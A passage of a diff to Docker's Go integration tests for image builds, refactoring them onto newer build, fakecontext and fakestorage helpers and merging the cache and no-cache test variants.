+		buildImage(name, build.WithDockerfile(fmt.Sprintf(`FROM busybox
+		%s`, tc.expression))).Assert(c, icmd.Expected{
+			ExitCode: 1,
+			Err:      tc.expectedStderr,
+		})
 	}
 }
 
@@ -2019,15 +1473,10 @@ func (s *DockerSuite) TestBuildEnv(c *check.C) {
 	testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows
 	name := "testbuildenv"
 	expected := "[PATH=/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PORT=2375]"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		ENV PATH /test:$PATH
-        ENV PORT 2375
-		RUN [ $(env | grep PORT) = 'PORT=2375' ]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		ENV PORT 2375
+		RUN [ $(env | grep PORT) = 'PORT=2375' ]`))
 	res := inspectField(c, name, "Config.Env")
 	if res != expected {
 		c.Fatalf("Env %s, expected %s", res, expected)
@@ -2039,14 +1488,11 @@ func (s *DockerSuite) TestBuildPATH(c *check.C) {
 
 	defPath := "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
 
-	fn := func(dockerfile string, exp string) {
-		_, err := buildImage("testbldpath", dockerfile, true)
-		c.Assert(err, check.IsNil)
-
+	fn := func(dockerfile string, expected string) {
+		buildImageSuccessfully(c, "testbldpath", build.WithDockerfile(dockerfile))
 		res := inspectField(c, "testbldpath", "Config.Env")
-
-		if res != exp {
-			c.Fatalf("Env %q, expected %q for dockerfile:%q", res, exp, dockerfile)
+		if res != expected {
+			c.Fatalf("Env %q, expected %q for dockerfile:%q", res, expected, dockerfile)
 		}
 	}
 
@@ -2070,18 +1516,15 @@ func (s *DockerSuite) TestBuildContextCleanup(c *check.C) {
 	testRequires(c, SameHostDaemon)
 
 	name := "testbuildcontextcleanup"
-	entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+	entries, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp"))
 	if err != nil {
 		c.Fatalf("failed to list contents of tmp dir: %s", err)
 	}
-	_, err = buildImage(name,
-		`FROM `+minimalBaseImage()+`
-        ENTRYPOINT ["/bin/echo"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+        ENTRYPOINT ["/bin/echo"]`))
+
+	entriesFinal, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp"))
 	if err != nil {
 		c.Fatalf("failed to list contents of tmp dir: %s", err)
 	}
@@ -2095,18 +1538,17 @@ func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) {
 	testRequires(c, SameHostDaemon)
 
 	name := "testbuildcontextcleanup"
-	entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+	entries, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp"))
 	if err != nil {
 		c.Fatalf("failed to list contents of tmp dir: %s", err)
 	}
-	_, err = buildImage(name,
-		`FROM `+minimalBaseImage()+`
-	RUN /non/existing/command`,
-		true)
-	if err == nil {
-		c.Fatalf("expected build to fail, but it didn't")
-	}
-	entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+
+	buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+	RUN /non/existing/command`)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+
+	entriesFinal, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp"))
 	if err != nil {
 		c.Fatalf("failed to list contents of tmp dir: %s", err)
 	}
@@ -2116,17 +1558,32 @@ func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) {
 
 }
 
+// compareDirectoryEntries compares two sets of FileInfo (usually taken from a directory)
+// and returns an error if different.
+func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error {
+	var (
+		e1Entries = make(map[string]struct{})
+		e2Entries = make(map[string]struct{})
+	)
+	for _, e := range e1 {
+		e1Entries[e.Name()] = struct{}{}
+	}
+	for _, e := range e2 {
+		e2Entries[e.Name()] = struct{}{}
+	}
+	if !reflect.DeepEqual(e1Entries, e2Entries) {
+		return fmt.Errorf("entries differ")
+	}
+	return nil
+}
+
 func (s *DockerSuite) TestBuildCmd(c *check.C) {
 	name := "testbuildcmd"
-
 	expected := "[/bin/echo Hello World]"
-	_, err := buildImage(name,
-		`FROM `+minimalBaseImage()+`
-        CMD ["/bin/echo", "Hello World"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+        CMD ["/bin/echo", "Hello World"]`))
+
 	res := inspectField(c, name, "Config.Cmd")
 	if res != expected {
 		c.Fatalf("Cmd %s, expected %s", res, expected)
@@ -2137,13 +1594,10 @@ func (s *DockerSuite) TestBuildExpose(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
 	name := "testbuildexpose"
 	expected := "map[2375/tcp:{}]"
-	_, err := buildImage(name,
-		`FROM scratch
-        EXPOSE 2375`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch
+        EXPOSE 2375`))
+
 	res := inspectField(c, name, "Config.ExposedPorts")
 	if res != expected {
 		c.Fatalf("Exposed ports %s, expected %s", res, expected)
@@ -2177,10 +1631,7 @@ func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) {
 	tmpl.Execute(buf, portList)
 
 	name := "testbuildexpose"
-	_, err := buildImage(name, buf.String(), true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(buf.String()))
 
 	// check if all the ports are saved inside Config.ExposedPorts
 	res := inspectFieldJSON(c, name, "Config.ExposedPorts")
@@ -2205,11 +1656,8 @@ func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) {
 func (s *DockerSuite) TestBuildExposeOrder(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
 	buildID := func(name, exposed string) string {
-		_, err := buildImage(name, fmt.Sprintf(`FROM scratch
-		EXPOSE %s`, exposed), true)
-		if err != nil {
-			c.Fatal(err)
-		}
+		buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM scratch
+		EXPOSE %s`, exposed)))
 		id := inspectField(c, name, "Id")
 		return id
 	}
@@ -2225,13 +1673,8 @@ func (s *DockerSuite) TestBuildExposeUpperCaseProto(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
 	name := "testbuildexposeuppercaseproto"
 	expected := "map[5678/udp:{}]"
-	_, err := buildImage(name,
-		`FROM scratch
-        EXPOSE 5678/UDP`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch
+        EXPOSE 5678/UDP`))
 	res := inspectField(c, name, "Config.ExposedPorts")
 	if res != expected {
 		c.Fatalf("Exposed ports %s, expected %s", res, expected)
@@ -2242,13 +1685,8 @@ func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) {
 	name := "testbuildentrypointinheritance"
 	name2 := "testbuildentrypointinheritance2"
 
-	_, err := buildImage(name,
-		`FROM busybox
-        ENTRYPOINT ["/bin/echo"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+        ENTRYPOINT ["/bin/echo"]`))
 	res := inspectField(c, name, "Config.Entrypoint")
 
 	expected := "[/bin/echo]"
@@ -2256,34 +1694,23 @@ func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) {
 		c.Fatalf("Entrypoint %s, expected %s", res, expected)
 	}
 
-	_, err = buildImage(name2,
-		fmt.Sprintf(`FROM %s
-        ENTRYPOINT []`, name),
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf(`FROM %s
+        ENTRYPOINT []`, name)))
 	res = inspectField(c, name2, "Config.Entrypoint")
 
 	expected = "[]"
-
 	if res != expected {
 		c.Fatalf("Entrypoint %s, expected %s", res, expected)
 	}
-
 }
 
 func (s *DockerSuite) TestBuildEmptyEntrypoint(c *check.C) {
 	name := "testbuildentrypoint"
 	expected := "[]"
 
-	_, err := buildImage(name,
-		`FROM busybox
-        ENTRYPOINT []`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+        ENTRYPOINT []`))
+
 	res := inspectField(c, name, "Config.Entrypoint")
 	if res != expected {
 		c.Fatalf("Entrypoint %s, expected %s", res, expected)
@@ -2295,13 +1722,9 @@ func (s *DockerSuite) TestBuildEntrypoint(c *check.C) {
 	name := "testbuildentrypoint"
 
 	expected := "[/bin/echo]"
-	_, err := buildImage(name,
-		`FROM `+minimalBaseImage()+`
-        ENTRYPOINT ["/bin/echo"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+        ENTRYPOINT ["/bin/echo"]`))
+
 	res := inspectField(c, name, "Config.Entrypoint")
 	if res != expected {
 		c.Fatalf("Entrypoint %s, expected %s", res, expected)
@@ -2310,282 +1733,131 @@ func (s *DockerSuite) TestBuildEntrypoint(c *check.C) {
 }
 
 // #6445 ensure ONBUILD triggers aren't committed to grandchildren
-func (s *DockerSuite) TestBuildOnBuildLimitedInheritence(c *check.C) {
-	var (
-		out2, out3 string
-	)
-	{
-		name1 := "testonbuildtrigger1"
-		dockerfile1 := `
+func (s *DockerSuite) TestBuildOnBuildLimitedInheritance(c *check.C) {
+	buildImageSuccessfully(c, "testonbuildtrigger1", build.WithDockerfile(`
 		FROM busybox
 		RUN echo "GRANDPARENT"
 		ONBUILD RUN echo "ONBUILD PARENT"
-		`
-		ctx, err := fakeContext(dockerfile1, nil)
-		if err != nil {
-			c.Fatal(err)
-		}
-		defer ctx.Close()
-
-		out1, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name1, ".")
-		if err != nil {
-			c.Fatalf("build failed to complete: %s, %v", out1, err)
-		}
-	}
-	{
-		name2 := "testonbuildtrigger2"
-		dockerfile2 := `
-		FROM testonbuildtrigger1
-		`
-		ctx, err := fakeContext(dockerfile2, nil)
-		if err != nil {
-			c.Fatal(err)
-		}
-		defer ctx.Close()
-
-		out2, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name2, ".")
-		if err != nil {
-			c.Fatalf("build failed to complete: %s, %v", out2, err)
-		}
-	}
-	{
-		name3 := "testonbuildtrigger3"
-		dockerfile3 := `
-		FROM testonbuildtrigger2
-		`
-		ctx, err := fakeContext(dockerfile3, nil)
-		if err != nil {
-			c.Fatal(err)
-		}
-		defer ctx.Close()
-
-		out3, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name3, ".")
-		if err != nil {
-			c.Fatalf("build failed to complete: %s, %v", out3, err)
-		}
-
-	}
-
+		`))
 	// ONBUILD should be run in second build.
-	if !strings.Contains(out2, "ONBUILD PARENT") {
-		c.Fatalf("ONBUILD instruction did not run in child of ONBUILD parent")
-	}
-
+	buildImage("testonbuildtrigger2", build.WithDockerfile("FROM testonbuildtrigger1")).Assert(c, icmd.Expected{
+		Out: "ONBUILD PARENT",
+	})
 	// ONBUILD should *not* be run in third build.
-	if strings.Contains(out3, "ONBUILD PARENT") {
+	result := buildImage("testonbuildtrigger3", build.WithDockerfile("FROM testonbuildtrigger2"))
+	result.Assert(c, icmd.Success)
+	if strings.Contains(result.Combined(), "ONBUILD PARENT") {
 		c.Fatalf("ONBUILD instruction ran in grandchild of ONBUILD parent")
 	}
-
 }
 
-func (s *DockerSuite) TestBuildWithCache(c *check.C) {
+func (s *DockerSuite) TestBuildSameDockerfileWithAndWithoutCache(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
 	name := "testbuildwithcache"
-	id1, err := buildImage(name,
-		`FROM scratch
-		MAINTAINER dockerio
-		EXPOSE 5432
-        ENTRYPOINT ["/bin/echo"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	id2, err := buildImage(name,
-		`FROM scratch
+	dockerfile := `FROM scratch
 		MAINTAINER dockerio
 		EXPOSE 5432
-        ENTRYPOINT ["/bin/echo"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+        ENTRYPOINT ["/bin/echo"]`
+	buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile))
+	id1 := getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile))
+	id2 := getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(dockerfile))
+	id3 := getIDByName(c, name)
 	if id1 != id2 {
 		c.Fatal("The cache should have been used but hasn't.")
 	}
-}
-
-func (s *DockerSuite) TestBuildWithoutCache(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
-	name := "testbuildwithoutcache"
-	name2 := "testbuildwithoutcache2"
-	id1, err := buildImage(name,
-		`FROM scratch
-		MAINTAINER dockerio
-		EXPOSE 5432
-        ENTRYPOINT ["/bin/echo"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	id2, err := buildImage(name2,
-		`FROM scratch
-		MAINTAINER dockerio
-		EXPOSE 5432
-        ENTRYPOINT ["/bin/echo"]`,
-		false)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if id1 == id2 {
+	if id1 == id3 {
 		c.Fatal("The cache should have been invalided but hasn't.")
 	}
 }
 
+// Make sure that ADD/COPY still populate the cache even if they don't use it
 func (s *DockerSuite) TestBuildConditionalCache(c *check.C) {
 	name := "testbuildconditionalcache"
 
 	dockerfile := `
 		FROM busybox
         ADD foo /tmp/`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"foo": "hello",
+		}))
 	defer ctx.Close()
 
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatalf("Error building #1: %s", err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
 
 	if err := ctx.Add("foo", "bye"); err != nil {
 		c.Fatalf("Error modifying foo: %s", err)
 	}
 
-	id2, err := buildImageFromContext(name, ctx, false)
-	if err != nil {
-		c.Fatalf("Error building #2: %s", err)
-	}
+	// Updating a file should invalidate the cache
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
 	if id2 == id1 {
 		c.Fatal("Should not have used the cache")
 	}
 
-	id3, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatalf("Error building #3: %s", err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id3 := getIDByName(c, name)
 	if id3 != id2 {
 		c.Fatal("Should have used the cache")
 	}
 }
 
-func (s *DockerSuite) TestBuildAddLocalFileWithCache(c *check.C) {
-	// local files are not owned by the correct user
-	testRequires(c, NotUserNamespace)
-	name := "testbuildaddlocalfilewithcache"
-	name2 := "testbuildaddlocalfilewithcache2"
-	dockerfile := `
+func (s *DockerSuite) TestBuildAddMultipleLocalFileWithAndWithoutCache(c *check.C) {
+	name := "testbuildaddmultiplelocalfilewithcache"
+	baseName := name + "-base"
+
+	cli.BuildCmd(c, baseName, build.WithDockerfile(`
 		FROM busybox
+		ENTRYPOINT ["/bin/sh"]
+	`))
+
+	dockerfile := `
+		FROM testbuildaddmultiplelocalfilewithcache-base
         MAINTAINER dockerio
-        ADD foo /usr/lib/bla/bar
-		RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
+        ADD foo Dockerfile /usr/lib/bla/
+		RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"`
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{
 		"foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	id2, err := buildImageFromContext(name2, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
+	result2 := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
+	result3 := cli.BuildCmd(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx))
+	id3 := getIDByName(c, name)
 	if id1 != id2 {
-		c.Fatal("The cache should have been used but hasn't.")
+		c.Fatalf("The cache should have been used but hasn't: %s", result2.Stdout())
+	}
+	if id1 == id3 {
+		c.Fatalf("The cache should have been invalided but hasn't: %s", result3.Stdout())
 	}
 }
 
-func (s *DockerSuite) TestBuildAddMultipleLocalFileWithCache(c *check.C) {
-	name := "testbuildaddmultiplelocalfilewithcache"
-	name2 := "testbuildaddmultiplelocalfilewithcache2"
-	dockerfile := `
-		FROM busybox
-        MAINTAINER dockerio
-        ADD foo Dockerfile /usr/lib/bla/
-		RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	id2, err := buildImageFromContext(name2, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if id1 != id2 {
-		c.Fatal("The cache should have been used but hasn't.")
-	}
-}
-
-func (s *DockerSuite) TestBuildAddLocalFileWithoutCache(c *check.C) {
-	// local files are not owned by the correct user
-	testRequires(c, NotUserNamespace)
-	name := "testbuildaddlocalfilewithoutcache"
-	name2 := "testbuildaddlocalfilewithoutcache2"
-	dockerfile := `
-		FROM busybox
-        MAINTAINER dockerio
-        ADD foo /usr/lib/bla/bar
-		RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	id2, err := buildImageFromContext(name2, ctx, false)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if id1 == id2 {
-		c.Fatal("The cache should have been invalided but hasn't.")
-	}
-}
-
-func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) {
-	name := "testbuildcopydirbutnotfile"
-	name2 := "testbuildcopydirbutnotfile2"
-
+func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) {
+	name := "testbuildcopydirbutnotfile"
+	name2 := "testbuildcopydirbutnotfile2"
+
 	dockerfile := `
         FROM ` + minimalBaseImage() + `
         COPY dir /tmp/`
-	ctx, err := fakeContext(dockerfile, map[string]string{
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{
 		"dir/foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
 	// Check that adding file with similar name doesn't mess with cache
 	if err := ctx.Add("dir_file", "hello2"); err != nil {
 		c.Fatal(err)
 	}
-	id2, err := buildImageFromContext(name2, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name2, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name2)
 	if id1 != id2 {
 		c.Fatal("The cache should have been used but wasn't")
 	}
@@ -2600,25 +1872,18 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) {
         FROM ` + minimalBaseImage() + `
         MAINTAINER dockerio
         ADD . /usr/lib/bla`
-	ctx, err := fakeContext(dockerfile, map[string]string{
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{
 		"foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
 	// Check that adding file invalidate cache of "ADD ."
 	if err := ctx.Add("bar", "hello2"); err != nil {
 		c.Fatal(err)
 	}
-	id2, err := buildImageFromContext(name2, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name2, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name2)
 	if id1 == id2 {
 		c.Fatal("The cache should have been invalided but hasn't.")
 	}
@@ -2626,10 +1891,8 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) {
 	if err := ctx.Add("foo", "hello1"); err != nil {
 		c.Fatal(err)
 	}
-	id3, err := buildImageFromContext(name3, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name3, build.WithExternalBuildContext(ctx))
+	id3 := getIDByName(c, name3)
 	if id2 == id3 {
 		c.Fatal("The cache should have been invalided but hasn't.")
 	}
@@ -2639,101 +1902,54 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) {
 	if err := ctx.Add("foo", "hello1"); err != nil {
 		c.Fatal(err)
 	}
-	id4, err := buildImageFromContext(name4, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name4, build.WithExternalBuildContext(ctx))
+	id4 := getIDByName(c, name4)
 	if id3 != id4 {
 		c.Fatal("The cache should have been used but hasn't.")
 	}
 }
 
+// FIXME(vdemeester) this really seems to test the same thing as before (TestBuildAddMultipleLocalFileWithAndWithoutCache)
 func (s *DockerSuite) TestBuildAddCurrentDirWithoutCache(c *check.C) {
 	name := "testbuildaddcurrentdirwithoutcache"
-	name2 := "testbuildaddcurrentdirwithoutcache2"
 	dockerfile := `
         FROM ` + minimalBaseImage() + `
         MAINTAINER dockerio
         ADD . /usr/lib/bla`
-	ctx, err := fakeContext(dockerfile, map[string]string{
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{
 		"foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	id2, err := buildImageFromContext(name2, ctx, false)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
 	if id1 == id2 {
 		c.Fatal("The cache should have been invalided but hasn't.")
 	}
 }
 
-func (s *DockerSuite) TestBuildAddRemoteFileWithCache(c *check.C) {
+func (s *DockerSuite) TestBuildAddRemoteFileWithAndWithoutCache(c *check.C) {
 	name := "testbuildaddremotefilewithcache"
-	server, err := fakeStorage(map[string]string{
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{
 		"baz": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer server.Close()
 
-	id1, err := buildImage(name,
-		fmt.Sprintf(`FROM `+minimalBaseImage()+`
-        MAINTAINER dockerio
-        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	id2, err := buildImage(name,
-		fmt.Sprintf(`FROM `+minimalBaseImage()+`
+	dockerfile := fmt.Sprintf(`FROM `+minimalBaseImage()+`
         MAINTAINER dockerio
-        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+        ADD %s/baz /usr/lib/baz/quux`, server.URL())
+	cli.BuildCmd(c, name, build.WithDockerfile(dockerfile))
+	id1 := getIDByName(c, name)
+	cli.BuildCmd(c, name, build.WithDockerfile(dockerfile))
+	id2 := getIDByName(c, name)
+	cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile))
+	id3 := getIDByName(c, name)
+
 	if id1 != id2 {
 		c.Fatal("The cache should have been used but hasn't.")
 	}
-}
-
-func (s *DockerSuite) TestBuildAddRemoteFileWithoutCache(c *check.C) {
-	name := "testbuildaddremotefilewithoutcache"
-	name2 := "testbuildaddremotefilewithoutcache2"
-	server, err := fakeStorage(map[string]string{
-		"baz": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer server.Close()
-
-	id1, err := buildImage(name,
-		fmt.Sprintf(`FROM `+minimalBaseImage()+`
-        MAINTAINER dockerio
-        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	id2, err := buildImage(name2,
-		fmt.Sprintf(`FROM `+minimalBaseImage()+`
-        MAINTAINER dockerio
-        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
-		false)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if id1 == id2 {
+	if id1 == id3 {
 		c.Fatal("The cache should have been invalided but hasn't.")
 	}
 }
@@ -2744,29 +1960,18 @@ func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) {
 	name3 := name + "3"
 
 	files := map[string]string{"baz": "hello"}
-	server, err := fakeStorage(files)
-	if err != nil {
-		c.Fatal(err)
-	}
+	server := fakestorage.New(c, "", fakecontext.WithFiles(files))
 	defer server.Close()
 
-	ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+`
         MAINTAINER dockerio
-        ADD %s/baz /usr/lib/baz/quux`, server.URL()), nil)
-	if err != nil {
-		c.Fatal(err)
-	}
+        ADD %s/baz /usr/lib/baz/quux`, server.URL())))
 	defer ctx.Close()
 
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	id2, err := buildImageFromContext(name2, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
+	cli.BuildCmd(c, name2, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name2)
 	if id1 != id2 {
 		c.Fatal("The cache should have been used but wasn't - #1")
 	}
@@ -2777,86 +1982,67 @@ func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) {
 	// allow some time for clock to pass as mtime precision is only 1s
 	time.Sleep(2 * time.Second)
 
-	server2, err := fakeStorage(files)
-	if err != nil {
-		c.Fatal(err)
-	}
+	server2 := fakestorage.New(c, "", fakecontext.WithFiles(files))
 	defer server2.Close()
 
-	ctx2, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
+	ctx2 := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+`
         MAINTAINER dockerio
-        ADD %s/baz /usr/lib/baz/quux`, server2.URL()), nil)
-	if err != nil {
-		c.Fatal(err)
-	}
+        ADD %s/baz /usr/lib/baz/quux`, server2.URL())))
 	defer ctx2.Close()
-	id3, err := buildImageFromContext(name3, ctx2, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name3, build.WithExternalBuildContext(ctx2))
+	id3 := getIDByName(c, name3)
 	if id1 != id3 {
 		c.Fatal("The cache should have been used but wasn't")
 	}
 }
 
-func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithCache(c *check.C) {
+// FIXME(vdemeester) this really seems to test the same thing as before (combined)
+func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithAndWithoutCache(c *check.C) {
 	name := "testbuildaddlocalandremotefilewithcache"
-	server, err := fakeStorage(map[string]string{
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{
 		"baz": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer server.Close()
 
-	ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+`
         MAINTAINER dockerio
         ADD foo /usr/lib/bla/bar
-        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
-		map[string]string{
+        ADD %s/baz /usr/lib/baz/quux`, server.URL())),
+		fakecontext.WithFiles(map[string]string{
 			"foo": "hello world",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
+		}))
 	defer ctx.Close()
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
